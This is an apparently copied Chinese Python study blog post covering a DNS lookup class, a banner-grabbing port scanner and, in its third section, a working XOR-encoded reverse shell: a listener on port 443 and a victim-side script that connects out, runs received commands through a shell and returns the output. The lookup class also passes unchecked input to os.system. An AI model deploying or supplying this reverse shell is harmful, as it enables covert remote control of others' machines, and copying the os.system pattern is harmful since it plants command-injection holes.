fb.python-study.1

来源：互联网发布：火妹网络编辑：程序博客网时间：2024/05/18 09:03

0x01.python类

<p>#coding=utf-8import osclass Domain:    def __init__(self,domain,port,protocol):        self.domain=domain        self.port=port        self.protocol=protocol    def URL(self):        if self.protocol=='https':            URL='https://'+self.domain+':'+self.port+'/'        if self.protocol=='http':            URL='http://'+self.domain+':'+self.port+'/'        return URL    def lookup(self):        os.system("host  "+self.domain)        if __name__=="__main__":    domain=Domain('www.freebuf.com','80','http')    print domain.URL()    print domain.port    print domain.protocol    domain.lookup()        </p>

the end:

root@kali:~/Desktop# python ./test.py http://www.freebuf.com:80/80httpwww.freebuf.com has address 123.151.180.21

enviroment: kali+py2.7.3

0x02 scan port

开机了本机的ssh也就是22端口。一个简单的演示。

#coding=utf-8import socketports=[21,22,53,80,443,445,3389,5050,5678,8080,8081]hosts=['127.0.0.1']for host in hosts:    for port in ports:        try:            s=socket.socket()    print "[+]Attempting to connect to "+host+":"+str(port)    s.connect((host,port))            s.send('adsfsafdsfadfsadfasdfasdfas /n')            banner=s.recv(1024)            if banner:                 print "[+]"+host+":"+str(port)+" open: \n"+banner    s.close()except:    pass

结果：

root@kali:~/Desktop# python ./scan.py [+]Attempting to connect to 127.0.0.1:21[+]Attempting to connect to 127.0.0.1:22[+]127.0.0.1:22 open: SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u2[+]Attempting to connect to 127.0.0.1:53[+]Attempting to connect to 127.0.0.1:80[+]Attempting to connect to 127.0.0.1:443[+]Attempting to connect to 127.0.0.1:445[+]Attempting to connect to 127.0.0.1:3389[+]Attempting to connect to 127.0.0.1:5050[+]Attempting to connect to 127.0.0.1:5678[+]Attempting to connect to 127.0.0.1:8080[+]Attempting to connect to 127.0.0.1:8081

这只是个示例程序吧不实用、在扫一下不能既recv又send的程序时，会卡在recv上

0x03 Reverse Shell – 反向shell

一个简单的udp server-client.py

#coding=utf-8import sockethost=''port=1024bufsize=128addr=(host,port)udp_server=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)udp_server.bind(addr)while True:    print 'waiting for message...'    data,addr=udp_server.recvfrom(bufsize)    print '...received from and return to:'+str(addr)+": "+dataudp_server.close()

#coding=utf-8import sockethost='localhost'port=1024bufsize=128addr=(host,port)udp_client=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)while True:    data=raw_input('>')    if not data:        break    udp_client.sendto(data,addr)udp_client.close()

接下来是一个反向shell的演示程序。

attacker.py

#coding=utf-8import socket"""建立socket监听端口"""s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.bind(("0.0.0.0", 443))s.listen(2048)print "Listening on port 443... "#接受连接  得到肉鸡(client, (ip, port)) = s.accept()print " recived connection from : ", ipwhile True:    command = raw_input('~$ ')    encode = bytearray(command)    for i in range(len(encode)):        encode[i] ^= 0x41        client.send(encode)#send    en_data = client.recv(2048)#recv     decode = bytearray(en_data)    for i in range(len(decode)):        decode[i] ^= 0x41    print decodeclient.close()s.close()

shell.py

#!/usr/bin/pythonimport socket, subprocess, sysRHOST = sys.argv[1]RPORT = 443s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((RHOST, RPORT))while True:    # receive XOR encoded data from network socket    data = s.recv(1024)    # XOR the data again with a '\x41' to get back to normal data    en_data = bytearray(data)    for i in range(len(en_data)):        en_data[i] ^= 0x41    # Execute the decode data as a command.    # The subprocess module is great because we can PIPE STDOUT/STDERR/STDIN to a variable    comm = subprocess.Popen(str(en_data), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)    comm.wait()    STDOUT, STDERR = comm.communicate()       print STDERR    # Encode the output and send to RHOST    en_STDOUT= bytearray(STDOUT)    for i in range(len(en_STDOUT)):        en_STDOUT[i] ^= 0x41    s.send(en_STDOUT)s.close()

从中可以看书攻击者开启自己的443端口，然后在受害者上运行shell.py可使受害机器连接的攻击者的机器上，同时实用subprocess模块执行由attacker发过来的命令，并将受害机器的命令回显发回到攻击者的机器上。相当于一个远程shell吧。并不是最标准的交互式shell。（nc反弹拿shell）

0 0